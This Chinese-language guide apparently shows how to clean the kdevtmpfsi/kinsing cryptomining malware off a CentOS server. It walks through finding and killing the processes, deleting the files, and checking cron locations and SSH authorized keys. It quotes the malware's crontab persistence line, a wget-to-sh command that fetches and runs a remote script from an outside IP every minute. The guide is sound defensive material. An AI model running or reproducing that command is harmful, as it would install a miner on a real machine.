病毒清理方法集锦

1.kdevtmpfsi病毒进程（挖矿）导致CPU过高
打开一个终端
执行top 查看占CPU任务名
按1查看具体进程
再打开一个终端
查看相应的病毒文件
一般病毒都都有守护进程，你杀掉会重新启动，必须删除文件的同时，去掉可能存在的定时任务
[wsx@VM-0-5-centos ~]$ ps -ef | grep kinsing
wsx 4572 2594 0 05:48 pts/0 00:00:00 grep --color=auto kinsing
zd 23244 1 0 8月01 ? 06:03:42 /tmp/kinsing
[wsx@VM-0-5-centos ~]$ ps -ef | grep kdevtmpfsi
wsx 4574 2594 0 13:49 pts/0 00:00:00 grep --color=auto kdevtmpfsi
zd 25128 1 97 8月01 ? 37-12:55:38 /tmp/kdevtmpfsi
查看指定用户的定时任务：
$ sudo crontab -e -u postgres
* * * * * wget -q -O - http://100.13.236.17/h2.sh | sh > /dev/null 2>&1
把这个定时任务删除，同时杀掉上面的进程
[wsx@VM-0-5-centos ~]$ sudo kill -9 25128
[wsx@VM-0-5-centos ~]$ sudo kill -9 23244
[wsx@VM-0-5-centos ~]$ sudo rm /tmp/kinsing
[wsx@VM-0-5-centos ~]$ sudo rm /tmp/kdevtmpfsi
查看top，看有什么遗漏没有。如果发现还有大量未知的shell运行，进行批量删除即可。
检查以下是否有计划任务
/etc/cron.d/、/etc/cron.daily/、/etc/cron.deny、/etc/cron.hourly/、/etc/cron.monthly/、/etc/crontab、/etc/cron.weekly/、/var/spool/cron/、/var/spool/cron/crontabs/root、/usr/local/bin/dns、/etc/hosts、/etc/sysupdate、/tmp/xms、/var/spool/cron/root、/etc/cron.d/root、/var/spool/cron/crontabs/root
检查是否有可疑公钥
cat ~/.ssh/authorized_keys